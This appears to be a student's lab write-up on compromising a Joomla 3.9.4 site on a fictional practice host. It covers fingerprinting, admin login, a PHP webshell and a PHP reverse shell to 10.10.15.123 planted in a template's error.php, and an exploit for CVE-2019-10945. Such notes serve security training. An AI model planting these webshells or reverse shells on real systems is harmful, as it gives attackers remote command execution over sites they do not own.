# Abusing Built-in Functionality - After finding credentials for `admin` in the last section, we can login to the target backend at `http://dev.inlanefreight.local/administrator` ![[images/Pasted image 20260119192341.png]] - Note: If we receive an error stating `An error has occurred. Call to a member function format() on null` after logging in, navigate to "http://dev.inlanefreight.local/administrator/index.php?option=com_plugins" and disable the `Quick Icon - PHP Version Check` plugin - This will allow the control panel to display properly - Once logged in as `admin`, we can add a snippet of PHP code to gain RCE by customizing a template - Click `Templates` from the dashboard to show the templates menu ![[images/Pasted image 20260119192506.png]] - From above, we can choose `protostar` under the `Template` column header to bring us to the `Templates: Customise` page ![[images/Pasted image 20260119192552.png]] - From above, we can chose to edit `erorr.php` and add the below one liner and click `save & close` ```php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ``` ![[images/Pasted image 20260119192713.png]] - Now we can interact with the webshell using `cURL` ```bash curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id ``` - We can choose to switch to a revshell if necessary to begin looking for privesc vectors # Leveraging Known Vulns - There have been at least [426](https://www.cvedetails.com/vulnerability-list/vendor_id-3496/Joomla.html) Joomla-related vulns associated with CVEs -  [CVE-2019-10945](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945) corresponds to a `joomla` core vuln in version 3.9.4 - This is a directory traversal and authenticated file deletion vulnerability - We can use [this](https://www.exploit-db.com/exploits/46710) exploit script to leverage the vulnerability and list the contents of the webroot and other directories - The python3 version of this same script can be found [here](https://github.com/dpgg101/CVE-2019-10945) - Below is an example usage of `joomla_dir_trav.py` with `python2.7` ```bash python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir / ``` # Exercise ## Initial Enum - `ping` test ![[images/Pasted image 20260119193953.png]] - `nmap` scans ![[images/Pasted image 20260119194022.png]]![[images/Pasted image 20260119194033.png]] - update `/etc/hosts` ![[images/Pasted image 20260119194142.png]] - visit `dev.inlanefreight.local` ![[images/Pasted image 20260119194204.png]] - even though we can tell base don the favicon above, confirm usage of `joomla` - visit `robots.txt` ![[images/Pasted image 20260119194232.png]] - use below `cURL` command to `grep` against page source ```bash curl -s http://dev.inlanefreight.local/ | grep -i joomla ``` ![[images/Pasted image 20260119194249.png]] ## Fingerprint Joomla Version - Use below `cURL` commands - we are on `joomla` version 3.9.4 ```bash curl -s http://dev.inlanefreight.local/README.txt | head -n 5 ``` ![[images/Pasted image 20260119194309.png]] ```bash curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format - ``` ![[images/Pasted image 20260119194359.png]] ## Enumerate Joomla Users - Recheck password for `admin` using `joomla-brute.py` ![[images/Pasted image 20260119194504.png]] ## Login as admin - use above creds ![[images/Pasted image 20260119194604.png]] - we are getting the error mentioned in the note for this section ![[images/Pasted image 20260119194630.png]] - visit `http://dev.inlanefreight.local/administrator/index.php?option=com_plugins` ![[images/Pasted image 20260119194723.png]] - disable the `Quick Icon - PHP Version Check` plugin ![[images/Pasted image 20260119194741.png]] - we have the admin dashboard ![[images/Pasted image 20260119194805.png]] ## Edit template with a revshell - go to `Templates` and select the `protostar` template (not styles) ![[images/Pasted image 20260119194922.png]] - after starting a listener on the Kali machine at port 800, edit `error.php` to include below revshell from [Online - Reverse Shell Generator](https://www.revshells.com/) ```php php -r '$sock=fsockopen("10.10.15.123",8000);system("sh <&3 >&3 2>&3");' ``` - visit `/error.php` with below `cURL` command ```bash curl -s http://dev.inlanefreight.local/templates/protostar/error.php ``` - connection is auto-closing - not sure what's wrong here ![[images/Pasted image 20260119195715.png]] ## Edit template with simple webshell - try a simple webshell as below ```bash system($_GET['cmd']); ``` ![[images/Pasted image 20260119195739.png]] - now try to interact with webshell with below `cURL` command ```bash curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id ``` - we have a working webshell ![[images/Pasted image 20260119195901.png]] - list current dir ![[images/Pasted image 20260119200008.png]] - go up a level ![[images/Pasted image 20260119200014.png]] - list `dev.inlanefreight.local` ![[images/Pasted image 20260119200040.png]] - `cat` the flag